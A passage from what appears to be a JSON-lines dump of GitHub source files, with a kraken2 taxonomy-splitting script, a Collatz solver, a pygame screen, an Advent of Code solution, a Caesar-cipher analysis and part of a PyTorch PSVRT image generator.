in 'mpa' style using Taxonkit\n#modified by James Riddell (riddell.26@buckeyemail.osu.edu) to output only the sequence headers separated into three files based on the taxonomic domain of the sequence assigned by kraken2\nfrom argparse import ArgumentParser\nimport subprocess\n\n#get the default kraken2 output and the file to save translated names file to\nparser = ArgumentParser()\nparser.add_argument(\"--infile\",dest=\"infile\", help=\"Kraken output file to be translated: <sample>-krak.txt\")\nargs = parser.parse_args()\n\n#open the files\ninfile = open(args.infile, 'r')\nsample = args.infile.split('-krak.txt')[0]\nbac_outfile = open(sample + '-krak-bacteria.txt', 'w')\narch_outfile = open(sample + '-krak-archaea.txt', 'w')\neuk_outfile = open(sample + '-krak-eukaryota.txt', 'w')\n\n#read name to taxid mapping\nreadnames=[]\ntaxids=[]\n\n#unique taxids to find the taxonomic names for\nuniqueids=[]\n\n#go through each kraken result and get taxids\nfor i in infile:\n row = i.split(\"\\t\")\n readname = row[1]\n taxid = row[2]\n readnames.append(readname)\n taxids.append(taxid)\n if taxid not in uniqueids:\n uniqueids.append(taxid)\n\n#dictionary to store found ids\nbac_taxdic={}\narch_taxdic={}\neuk_taxdic={}\n\n#get the full lineage names for unique taxids using Taxonkit\ntaxonkit = subprocess.check_output(\"echo '{}' | taxonkit lineage | taxonkit reformat\".format(\"\\n\".join(uniqueids)), shell=True)\ntaxonkit=taxonkit.decode().split(\"\\n\")\n\n#taxonomic levels\nlevs=[\"d__\",\"p__\",\"c__\",\"o__\",\"f__\",\"g__\",\"s__\"]\n\n#function to generate the mpa name from a given taxid by calling Taxonkit\ndef formName(name):\n names = name.split(\";\")\n formnames = []\n for i in 
range(len(names)):\n if names[i] != \"\":\n formnames.append(levs[i]+names[i].replace(\" \",\"_\"))\n return(\"|\".join(formnames))\n\n#reformat to mpa style\nfor i in taxonkit:\n if i != \"\":\n row=i.split(\"\\t\")\n tid=row[0]\n mpaname=formName(row[2])\n if 'd__Bacteria' in mpaname:\n bac_taxdic[tid] = mpaname\n elif 'd__Archaea' in mpaname:\n arch_taxdic[tid] = mpaname\n elif 'd__Eukaryota' in mpaname:\n euk_taxdic[tid] = mpaname\n\n#write the translated read to taxname file\nfor i in range(len(readnames)):\n t=taxids[i]\n if t in bac_taxdic:\n bac_outfile.write(\"{}\\n\".format(readnames[i]))\n elif t in arch_taxdic:\n arch_outfile.write(\"{}\\n\".format(readnames[i]))\n elif t in euk_taxdic:\n euk_outfile.write(\"{}\\n\".format(readnames[i]))\nbac_outfile.close()\narch_outfile.close()\neuk_outfile.close()\n","repo_name":"jamesriddellv/euk-metagenomics-pipeline","sub_path":"translatekraken2_prebin.py","file_name":"translatekraken2_prebin.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5646901989","text":"# if n is even n > n / 2\n# if n is odd n -> 3n + 1\n\n#if we use 13 as a start: 13 > 40 > 20 > 10 > 5 > 16 > 8 > 4 > 2 > 1\n\n# there is no proof but we believe all sequences end at 1\n\n# find the longest sequence starting with a number under 1000000\n\n# powers of 2 will be fastest route down\n\n# we dont need to append first and last terms as they are in every list, also i assume it would be odd\n\ndef even(number):\n newNumber = number / 2\n return newNumber\n\n\ndef odd(number):\n newNumber = (3 * number) + 1\n return newNumber\n\nlargest_term = 0\nlargest_terms = []\n\nfor half_term in range(499999):\n term = (half_term * 2) + 1\n terms = []\n original_term = term\n while term != 1:\n if term % 2 == 0:\n newTerm = even(term)\n terms.append(newTerm)\n term = newTerm\n else:\n newTerm = odd(term)\n terms.append(newTerm)\n term = newTerm\n if len(terms) > len(largest_terms):\n largest_terms = terms\n largest_term = original_term\n\n\n\nprint(largest_term)\n\n","repo_name":"bencouser/project_euler","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74294333767","text":"import pygame\n\nfrom py_files.file_with_const import WIDTH, HEIGHT, clock, FPS\nfrom load_img import load_image\nfrom terminate import terminate\n\n\ndef you_dead(surface):\n \"\"\"fon = pygame.transform.scale(load_image('save_btn.jpg'), (WIDTH, HEIGHT))\n surface.blit(fon, (0, 0))\n\n font = pygame.font.SysFont('arial', HEIGHT // 25)\n text = font.render('*НАЖМИТЕ НА ЛЮБУЮ КЛАВИШУ ДЛЯ ПРОДОЛЖЕНИЯ*', True, 'dark red')\n text_x = WIDTH * 0.1\n text_y = HEIGHT * 0.8\"\"\"\n\n fon = pygame.transform.scale(load_image('killing_window.png'), (WIDTH, HEIGHT))\n surface.blit(fon, (0, 0))\n while True:\n\n \"\"\"surface.blit(text, (text_x, text_y))\"\"\"\n\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n terminate()\n\n elif event.type == pygame.KEYDOWN or event.type == pygame.MOUSEBUTTONDOWN:\n return\n\n pygame.display.flip()\n clock.tick(FPS)","repo_name":"KsenyaShestakova/pygame_project_Shestakova_Potapova","sub_path":"screens/SCREEN_dead.py","file_name":"SCREEN_dead.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5343486131","text":"#Advent of Code 
2018 day 12\nfrom util import *\nDAY = 12\nYEAR = 2018\n\ndef get_data():\n return input_lines(DAY, YEAR)\n\n\ndata = get_data()\n\ninitial_state = data[0].split()[2]\ninitial_state = {x: initial_state[x] for x in range(len(initial_state))}\nstate = initial_state\nrules = [x.split() for x in data[2:]]\nrules = {x[0]: x[2] for x in rules}\n\ndef calc_score(current):\n score = 0\n for x in current:\n if current[x] == '#':\n score += x\n return score\n\ndef step(current):\n min_ = None\n max_ = None\n next_step = {}\n for x in current:\n if current[x] == '#':\n if min_ is None:\n min_ = max_ = x\n else:\n min_ = min(min_, x)\n max_ = max(max_, x)\n for i in range(min_ - 2, max_ + 3):\n r = [current.get(i + x, \".\") for x in range(-2, 3)]\n r = \"\".join(r)\n n = rules[r]\n next_step[i] = n\n return next_step\n\n\ndef to_string(current):\n min_ = None\n max_ = None\n for x in current:\n if current[x] == '#':\n if min_ is None:\n min_ = max_ = x\n else:\n min_ = min(min_, x)\n max_ = max(max_, x)\n return \"\".join(current[i] for i in range(min_, max_ + 1))\n\n\nfor i in range(20):\n state = step(state)\nfirst = calc_score(state)\n\nstate = initial_state\nt = 0\nexisted = {to_string(state): (calc_score(state), t)}\nwhile True:\n state = step(state)\n state_str = to_string(state)\n t += 1\n if state_str in existed:\n break\n else:\n existed[state_str] = (calc_score(state), t)\n\nscore, time = existed[state_str]\nscore_diff = calc_score(state) - score\nperiod = t - time\n# For my input the period was 1 so this works, if the period is not 1 more maths is needed\ngenerations = 50000000000\nsecond = (generations - time) * score_diff + score\n\nprint(f\"First: {first}\")\nprint(f\"Second: {second}\")\n","repo_name":"ChocolateChipKookie/AoC","sub_path":"AoC2018/solutions/12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36327056587","text":"# -*- coding:utf-8 -*-\r\n'''\r\n本题提供文本加密、字母频率统计以及频率分析法破解精度计算的Python3程序,请使用该程序进行以下分析:\r\n\r\n(1)分析不同错误容忍度(程序中tolerance超参数)对破解精度的影响。\r\n\r\n(2)分析不同的加密文本长度对破解精度的影响\r\n\r\n(3)分析不同类型的文本(学术、小说、新闻…)对破解精度的影响\r\n\r\n(4)分析同一类型中不同主题的文本(如新闻文本包含科技、政治、体育等不同主题)对破解精度的影响。\r\n\r\n需要提交:\r\n\r\n(1)程序文档,文档结构包括:问题描述、主要算法或者模型、实验数据及分析、有关说明(如引用他人程序说明);\r\n\r\n(2)程序源代码,其中需要包含注释,以及程序运行环境的说明;\r\n\r\n(3)提交方式:将有关文件打包成 xxP1.zip, 其中xx为学号,并上传到pintia.cn中。\r\n'''\r\nimport os\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom Caesar_Cipher import Caesar\r\n\r\n# Read files\r\ntextfiles = os.listdir(os.path.join('.','text'))\r\n# Delete saved files, if any\r\n_ = [os.remove(os.path.join('.','text',file)) for file in textfiles if 'part' in file.split('`')]\r\n_ = [os.remove(os.path.join('.','text',file)) for file in textfiles if 'encrypt' in file.split('`')]\r\n# Keep `.txt` files only\r\ntextfiles = [os.path.join('.','text',file) for file in textfiles\r\n if file.endswith('txt') and not 'encrypt' in file.split('`') and not 'part' in file.split('`')]\r\n# Classify files\r\nfiletypes = {}\r\ntypes = [file.split('`')[1] for file in textfiles]\r\nfor t in types:\r\n if not t in filetypes:\r\n filetypes[t] = [file for file in textfiles if t in file.split('`')]\r\n\r\n# Back up `Caesar`\r\nCAESAR = []\r\n\r\n# Choose a random `offset`\r\nOFFSET = np.random.randint(26)\r\n# Maximum value for tolerance\r\nTOLERANCE = 12\r\n\r\n# Accuracy(TOLERANCE,len(filetypes))\r\nACC = np.zeros((TOLERANCE,len(filetypes)),dtype='float64')\r\n# Accuracy of 
each type of text under each tolerance\r\nacc = [0 for _ in range(len(textfiles))]\r\n\r\nfor tol in range(TOLERANCE):\r\n for itypes, types in enumerate(filetypes):\r\n for itext, text in enumerate(filetypes[types]):\r\n\r\n C = Caesar(offset=OFFSET,tolerance=tol)\r\n CAESAR.append(C)\r\n\r\n # read, encrypt and save file\r\n C.read_file(text)\r\n C.encrypt()\r\n #C.save_to_file(os.path.join('.','text','`encrypt`'+' '+str(step).zfill(2)+'-'+str(STEPS)+text.split('`')[-1]))\r\n\r\n # use letter frency method to decrypt text and calculate accuracy\r\n letter_count = C.get_letter_count()\r\n en_letter_frequency = C.get_letter_frequency()\r\n accuracy, offset = C.get_accuracy(en_letter_frequency)\r\n\r\n # save results\r\n acc[itext] = accuracy*100\r\n ACC[tol][itypes] = sum(acc)/len([a for a in acc if not a == 0])\r\n acc = [0 for _ in range(len(textfiles))]\r\n print('Loading...{:6.2f}%'.format(100*(tol*len(filetypes)+itypes)/(len(filetypes)*TOLERANCE)))\r\n\r\n# Plot result\r\nfig = plt.figure(figsize=(8,6))\r\nax = fig.add_subplot(1,1,1,projection='3d')\r\nX = np.arange(len(filetypes))\r\nY = np.arange(TOLERANCE)\r\nZ = ACC\r\nplt.xticks(range(len([item for item in filetypes])), [item for item in filetypes])\r\nX, Y = np.meshgrid(X, Y)\r\nX, Y, Z = X.ravel(), Y.ravel(), Z.ravel()\r\nheight = np.zeros_like(Z)\r\nwidth = 0.3\r\ndepth = 0.8\r\nc = [[1-(z-min(Z))/(max(Z)-min(Z)), (z-min(Z))/(max(Z)-min(Z)), (z-min(Z))/(max(Z)-min(Z))/2] for z in Z]\r\nax.bar3d(X, Y, height, width, depth, Z, color=c)\r\nax.view_init(21, -125)\r\nax.set_title('Accuracy V.S. Types')\r\nax.set_xlabel('types')\r\nax.set_ylabel('tolerance')\r\nax.set_zlabel('accuracy/%')\r\n#plt.show()\r\nplt.savefig('Accuracy V.S. Types.jpg')\r\nplt.close()\r\n","repo_name":"SDaydreamer/course-work-Caesar-cipher","sub_path":"main-types.py","file_name":"main-types.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"42609807322","text":"import math\nimport torch\nfrom torch import nn\n# import torch.nn.functional as F\nfrom utils import gumbel_softmax, sample_gumbel\nfrom torch.distributions.relaxed_categorical import RelaxedOneHotCategorical\nfrom torch.distributions.multivariate_normal import MultivariateNormal\nfrom torch.distributions.normal import Normal\nfrom torch.distributions.half_normal import HalfNormal\nfrom torch.distributions.relaxed_bernoulli import RelaxedBernoulli\nfrom resources.constrained_normal import Normal as CNormal\n# from torch.distributions.constraint_registry import transform_to\n# from torch.distributions import transforms\n# from torch.distributions import transform_to\n# from torch.distributions import constraints\nimport utils\n\n\n# Fixed dataset params\nCATEGORICAL = False\nMAX_OBJECTS = 10\nMAX_OBJECT_SIZE = 10\nMIN_OBJECTS = 2\nMIN_OBJECT_SIZE = 1\nMIN_DYNAMIC_RANGE = 2\nOBJECT_MARGIN = 7\n# NORM_MEAN = torch.tensor([0., 0., 0.]).float()\n# NORM_STD = torch.tensor([1., 1., 1.]).float()\nNORM_MEAN = torch.tensor([0.485, 0.456, 0.406]).reshape(1, 3, 1, 1)\nNORM_STD = torch.tensor([0.229, 0.224, 0.225]).reshape(1, 3, 1, 1)\nGRID_RES = 10 # Default is 10x10 possible positions for objects\n\n# Initialize dataset lambdas\nSPATIAL_SCALE = torch.tensor(2).float()\nMINIMUM_SPATIAL_SCALE = torch.tensor(2.).float()\nDYNAMIC_RANGE_SCALE = torch.tensor(1.).float() # Relaxed bernoulli\n\n# Use categorical\nif CATEGORICAL:\n OBJECT_NUMBER_LOC = torch.zeros(MIN_OBJECTS).float() + .1 / MIN_OBJECTS\n 
OBJECT_NUMBER_LOC[0] = 1. - OBJECT_NUMBER_LOC.sum() + OBJECT_NUMBER_LOC[0] # noqa\n OBJECT_SIZE_LOC = torch.zeros(MAX_OBJECT_SIZE).float() + .1 / MAX_OBJECT_SIZE # noqa\n OBJECT_SIZE_LOC[0] = 1. - OBJECT_SIZE_LOC.sum() + OBJECT_SIZE_LOC[0]\n OBJECT_NUMBER_SCALE = torch.zeros([])\n OBJECT_SIZE_SCALE = torch.zeros([])\nelse:\n # Use gaussian\n OBJECT_NUMBER_LOC = torch.tensor(2.).float() # TODO: Set to 0\n OBJECT_SIZE_LOC = torch.tensor(1.).float() # TODO: Set to 0\n OBJECT_NUMBER_SCALE = torch.tensor(0.75).float()\n OBJECT_SIZE_SCALE = torch.tensor(0.75).float()\n\n\nclass Generator(nn.Module):\n def __init__(\n self,\n dataset,\n img_size,\n device,\n num_classes=2,\n task='sd',\n siamese=False,\n wn=False,\n batch_grad=False,\n one_object_size_per_batch=False,\n embedding_grad=False,\n gumbel_type='dist',\n categorical=CATEGORICAL,\n norm_mean=NORM_MEAN,\n norm_std=NORM_STD,\n spatial_scale=SPATIAL_SCALE,\n minimum_spatial_scale=MINIMUM_SPATIAL_SCALE,\n object_number_loc=OBJECT_NUMBER_LOC,\n object_number_scale=OBJECT_NUMBER_SCALE,\n object_size_loc=OBJECT_SIZE_LOC,\n object_size_scale=OBJECT_SIZE_SCALE,\n dynamic_range_scale=DYNAMIC_RANGE_SCALE,\n min_objects=MIN_OBJECTS,\n min_object_size=MIN_OBJECT_SIZE,\n min_dynamic_range=MIN_DYNAMIC_RANGE,\n object_margin=OBJECT_MARGIN,\n grid_res=GRID_RES,\n max_object_size=MAX_OBJECT_SIZE,\n max_objects=MAX_OBJECTS):\n \"\"\"Differentiable PSVRT generator.\n So far, generative model assumes that images are governed\n by four independent random variables:\n 1. Object location: bivarate gaussian\n 2. Object number: categorical\n 3. Object size:\n 4. Dynamic range: \"\"\"\n super(Generator, self).__init__()\n self.dataset = dataset\n self.img_size = img_size\n self.num_classes = num_classes\n self.min_objects = min_objects # Target # of same objs\n self.max_objects = max_objects\n self.device = device\n self.batch_grad = batch_grad\n self.minimum_spatial_scale = minimum_spatial_scale\n self.siamese = siamese\n self.object_margin = object_margin # Min distance btwn objs\n self.min_dynamic_range = min_dynamic_range\n self.one_object_size_per_batch = one_object_size_per_batch\n self.min_object_size = min_object_size\n self.max_object_size = max_object_size\n self.task = task.lower()\n self.wn = wn\n self.grid_res = grid_res\n self.embedding_grad = embedding_grad\n self.norm_mean = norm_mean.to(self.device)\n self.norm_std = norm_std.to(self.device)\n if self.siamese:\n self.reshape = (1, 3, 1, 1, 1)\n self.norm_mean = self.norm_mean.reshape(self.reshape)\n self.norm_std = self.norm_std.reshape(self.reshape)\n else:\n self.reshape = (1, 3, 1, 1)\n\n # Specify the distributions\n self.dists = []\n if CATEGORICAL:\n self.dists += [{\n 'name': 'num_objects',\n 'family': 'categorical',\n 'lambda_0': object_number_loc,\n 'lambda_0_scale': object_number_scale,\n 'return_sampler': True,\n 'trainable': True,\n }]\n self.dists += [{\n 'name': 'object_size',\n 'family': 'categorical',\n 'lambda_0': object_size_loc,\n 'lambda_0_scale': object_size_scale,\n 'return_sampler': True,\n 'trainable': True,\n }]\n else:\n self.dists += [{\n 'name': 'num_objects',\n # 'family': 'relaxed_bernoulli',\n 'family': 'normal',\n # 'family': 'categorical',\n 'lambda_0': object_number_loc,\n 'lambda_0_scale': object_number_scale,\n 'return_sampler': True,\n 'trainable': True,\n }]\n self.dists += [{\n 'name': 'object_size',\n 'family': 'normal',\n # 'family': 'categorical',\n 'lambda_0': object_size_loc,\n 'lambda_0_scale': object_size_scale,\n 'return_sampler': True,\n 
'trainable': True,\n }]\n self.dists += [{\n 'name': 'dynamic_range',\n 'family': 'normal',\n 'lambda_0': 0.,\n 'lambda_0_scale': dynamic_range_scale,\n 'return_sampler': True,\n 'trainable': False,\n }]\n self.dists += [{\n 'name': 'object_location',\n 'trainable': True,\n # 'family': 'gaussian',\n 'family': 'half_normal',\n 'return_sampler': True,\n 'lambda_0': 0., # [float(self.img_size / 2.), float(self.img_size / 2.)],\n 'lambda_0_scale': spatial_scale\n }]\n if gumbel_type == 'dist':\n self.gumbel_fun = self.gumbel_softmax_dist\n else:\n self.gumbel_fun = gumbel_softmax\n self.check_dists()\n self.init_challenge()\n\n def check_dists(self):\n \"\"\"Simple parameter checking for dists.\"\"\"\n for di in self.dists:\n keys = list(di.keys())\n assert 'name' in keys, 'Need a name for your dist.'\n assert 'trainable' in keys, 'Need a trainable for your dist.'\n assert 'family' in keys, 'Need a family for your dist.'\n assert 'lambda_0' in keys, 'Need a lambda_0 for your dist.'\n assert 'return_sampler' in keys, 'Need a return_sampler for your dist.' # noqa\n\n def _test(self):\n \"\"\"Add a test here.\"\"\"\n return\n\n def normalize_weights(self, name, prop):\n \"\"\"Apply weight normalization.\"\"\"\n g_attr_name = '{}_{}'.format(name, '{}_g'.format(prop))\n v_attr_name = '{}_{}'.format(name, '{}_v'.format(prop))\n g = getattr(self, g_attr_name)\n v = getattr(self, v_attr_name)\n return v * (g / torch.norm(v)).expand_as(v)\n\n def init_wns(self, w):\n \"\"\"Initialize weight normed weights.\"\"\"\n g = torch.norm(w)\n v = w / g.expand_as(w)\n return g, v\n\n def st_op(self, y):\n \"\"\"Apply ST operator.\"\"\"\n shape = y.size()\n _, ind = y.max(dim=-1)\n # y_hard = torch.zeros_like(y).scatter_(-1, ind, 1.0)\n ind = ind.unsqueeze(-1)\n y_hard = torch.zeros_like(y).scatter_(-1, ind, 1.0)\n y_hard = y_hard.view(*shape)\n y = (y_hard - y).detach() + y\n return y\n\n def gumbel_softmax_dist(\n self,\n param,\n name,\n temperature=1e-1,\n hard=True,\n sample_size=()):\n \"\"\"ST gumbel with pytorch distributions.\"\"\"\n gumbel = RelaxedOneHotCategorical(temperature, logits=param)\n y = gumbel.rsample(sample_size)\n if hard:\n # One-hot the y\n y = self.st_op(y)\n return y\n\n def init_challenge(self, mu=1e-4, sigma=1e-4, pi=1e-4, eps=1e-4):\n \"\"\"Initialize the perturbation vector r.\n We want to learn r, which perturbs the fixed random parameters\n \\lambda_0. 
To do this, we will initialize r as \\lambda_0, and\n use a generative loss to ensure r is minimally different than\n \\lambda_0.\n\n Initialization is lambda_0 + alpha * distribution_noise.\n \"\"\"\n for idx, row in enumerate(self.dists):\n trainable = row['trainable']\n # We have lambda_0 (for center/maybe scale)\n if not torch.is_tensor(row['lambda_0']):\n # If this is not a torch tensor, convert it\n row['lambda_0'] = torch.tensor(row['lambda_0'])\n\n # Send lambda_0 center to device\n row['lambda_0'] = row['lambda_0'].to(self.device)\n if (\n row['family'] == 'gaussian' or\n row['family'] == 'normal' or\n row['family'] == 'cnormal' or\n row['family'] == 'abs_normal'):\n if not torch.is_tensor(row['lambda_0_scale']):\n # If this is not a torch tensor, convert it\n row['lambda_0_scale'] = torch.is_tensor(row['lambda_0_scale']) # noqa\n # Send lambda_0 scale to device\n self.dists[idx]['lambda_0_scale'] = row['lambda_0_scale'].to(self.device) # noqa\n\n # Initilize challenge center/scale\n lambda_r = row['lambda_0'] + torch.randn_like(row['lambda_0']) * mu # noqa\n lambda_r_scale = row['lambda_0_scale'] + torch.randn_like(row['lambda_0_scale']) * sigma # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_g, lambda_r_v = self.init_wns(lambda_r)\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(lambda_r_scale) # noqa\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'center_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_v, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center')\n setattr(self, attr_name, nn.Parameter(lambda_r, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale, requires_grad=trainable)) # noqa\n elif row['family'] == 'half_normal':\n if not torch.is_tensor(row['lambda_0_scale']):\n # If this is not a torch tensor, convert it\n row['lambda_0_scale'] = torch.is_tensor(row['lambda_0_scale']) # noqa\n # Send lambda_0 scale to device\n self.dists[idx]['lambda_0_scale'] = row['lambda_0_scale'].to(self.device) # noqa\n\n # Initilize challenge center/scale\n lambda_r_scale = row['lambda_0_scale'] + torch.abs(torch.randn_like(row['lambda_0_scale'])) * sigma # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(\n lambda_r_scale)\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'scale_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'scale_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'scale')\n setattr(self, attr_name, nn.Parameter(lambda_r_scale, requires_grad=trainable)) # noqa\n elif row['family'] == 
'relaxed_bernoulli':\n # Handle pi of categorical dist (var/temp is hardcoded)\n soft_log_probs = torch.log(row['lambda_0'] + eps) # Don't save\n lambda_r = soft_log_probs # + torch.rand_like(soft_log_probs) * pi # noqa\n lambda_r = lambda_r.to(self.device) # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_g, lambda_r_v = self.init_wns(lambda_r)\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(\n lambda_r_scale)\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'center_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center')\n setattr(self, attr_name, nn.Parameter(lambda_r, requires_grad=trainable)) # noqa\n elif row['family'] == 'categorical':\n # Handle pi of categorical dist (var/temp is hardcoded)\n soft_log_probs = torch.log(row['lambda_0'] + eps) # Don't save\n lambda_r = soft_log_probs + sample_gumbel(soft_log_probs) * pi # noqa\n lambda_r = lambda_r.to(self.device) # noqa\n\n # Also add the r parameters to a list\n if self.wn:\n raise RuntimeError('Weightnorm not working for psvrt.')\n lambda_r_g, lambda_r_v = self.init_wns(lambda_r)\n lambda_r_scale_g, lambda_r_scale_v = self.init_wns(\n lambda_r_scale)\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center_g')\n setattr(self, attr_name, nn.Parameter(lambda_r_g, requires_grad=trainable)) # noqa\n attr_name = '{}_{}'.format(row['name'], 'center_v')\n setattr(self, attr_name, nn.Parameter(lambda_r_v, requires_grad=trainable)) # noqa\n else:\n # Also add the r parameters to a list\n attr_name = '{}_{}'.format(row['name'], 'center')\n setattr(self, attr_name, nn.Parameter(lambda_r, requires_grad=trainable)) # noqa\n else:\n raise NotImplementedError\n\n def rejection_sampling(\n self,\n object_margin,\n margin_offset,\n object_locations,\n max_rejections,\n num_objects,\n gau):\n \"\"\"Select samples with rejection sampling.\"\"\"\n assert object_locations is not None, \\\n 'Needs a list of previous object locations.'\n assert object_margin is not None, \\\n 'No sampling margin provided.'\n # Adjust coordinates so objects don't overlap\n working = True\n margin = object_margin + margin_offset # noqa\n count = 0\n while working:\n sample = gau.rsample()\n if num_objects == 0:\n return sample\n ds = torch.abs( # cityblock distance\n sample - torch.stack(object_locations, 0)).sum(-1)\n working = torch.any(ds < margin)\n count += 1\n if count > max_rejections:\n raise RuntimeError('Failed to sample images.')\n return sample\n\n def sample_lambda0_r(\n self,\n d,\n batch_size,\n offset=0,\n object_locations=None,\n object_margin=None,\n num_objects=None,\n gau=None,\n max_rejections=1000,\n margin_offset=2):\n \"\"\"Sample dataset parameters perturbed by r.\"\"\"\n name = d['name']\n family = d['family']\n attr_name = '{}_{}'.format(name, 'center')\n if self.wn:\n lambda_r = self.normalize_weights(name=name, prop='center')\n elif family != 'half_normal':\n lambda_r = getattr(self, attr_name)\n parameters = []\n if family == 'gaussian':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n # 
lambda_r = transform_to(constraints.greater_than(\n # 1.))(lambda_r)\n # lambda_r_scale = transform_to(constraints.greater_than(\n # self.minimum_spatial_scale))(lambda_r_scale)\n # TODO: Add constraint function here\n # w=module.weight.data\n # w=w.clamp(0.5,0.7)\n # module.weight.data=w\n\n if gau is None:\n gau = MultivariateNormal(\n loc=lambda_r,\n covariance_matrix=lambda_r_scale)\n if d['return_sampler']:\n return gau\n if name == 'object_location':\n if not len(object_locations):\n return gau.rsample(), gau\n else:\n parameters = self.rejection_sampling(\n object_margin=object_margin,\n margin_offset=margin_offset,\n object_locations=object_locations,\n max_rejections=max_rejections,\n num_objects=num_objects,\n gau=gau)\n else:\n raise NotImplementedError(name)\n elif family == 'normal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n nor = Normal(loc=lambda_r, scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n elif name == 'object_location':\n # nor.arg_constraints['scale'] = constraints.greater_than(self.minimum_spatial_scale) # noqa\n if not len(object_locations):\n return nor.rsample(), nor\n else:\n parameters = self.rejection_sampling(\n object_margin=object_margin,\n margin_offset=margin_offset,\n object_locations=object_locations,\n max_rejections=max_rejections,\n num_objects=num_objects,\n gau=nor)\n else:\n for idx in range(batch_size):\n parameters.append(nor.rsample())\n elif family == 'cnormal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n\n # Explicitly clamp the scale!\n lambda_r_scale = torch.clamp(lambda_r_scale, self.minimum_spatial_scale, 999.)\n nor = CNormal(loc=lambda_r, scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n elif name == 'object_location':\n # nor.arg_constraints['scale'] = constraints.greater_than(self.minimum_spatial_scale) # noqa\n if not len(object_locations):\n return nor.rsample(), nor\n else:\n parameters = self.rejection_sampling(\n object_margin=object_margin,\n margin_offset=margin_offset,\n object_locations=object_locations,\n max_rejections=max_rejections,\n num_objects=num_objects,\n gau=nor)\n else:\n for idx in range(batch_size):\n parameters.append(nor.rsample())\n elif family == 'abs_normal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n # lambda_r = transform_to(Normal.arg_constraints['loc'])(lambda_r)\n # lambda_r_scale = transform_to(Normal.arg_constraints['scale'])(lambda_r_scale) # noqa\n # lambda_r = transforms.AbsTransform()(lambda_r)\n # lambda_r_scale = transforms.AbsTransform()(lambda_r_scale)\n # These kill grads!! # lambda_r = torch.abs(lambda_r)\n # These kill grads!! 
lambda_r_scale = torch.abs(lambda_r_scale)\n nor = Normal(loc=lambda_r, scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n else:\n parameters = nor.rsample([batch_size])\n elif family == 'half_normal':\n attr_name = '{}_{}'.format(name, 'scale')\n if self.wn:\n lambda_r_scale = self.normalize_weights(\n name=name,\n prop='scale')\n else:\n lambda_r_scale = getattr(self, attr_name)\n nor = HalfNormal(scale=lambda_r_scale)\n if d['return_sampler']:\n return nor\n else:\n parameters = nor.rsample([batch_size])\n elif family == 'categorical':\n if d['return_sampler']:\n gum = RelaxedOneHotCategorical(1e-1, logits=lambda_r)\n return gum\n # return lambda sample_size: self.argmax(self.gumbel_fun(lambda_r, name=name)) + offset # noqa\n for _ in range(batch_size):\n parameters.append(self.argmax(self.gumbel_fun(lambda_r, name=name)) + offset) # noqa Use default temperature -> max\n elif family == 'relaxed_bernoulli':\n bern = RelaxedBernoulli(temperature=1e-1, 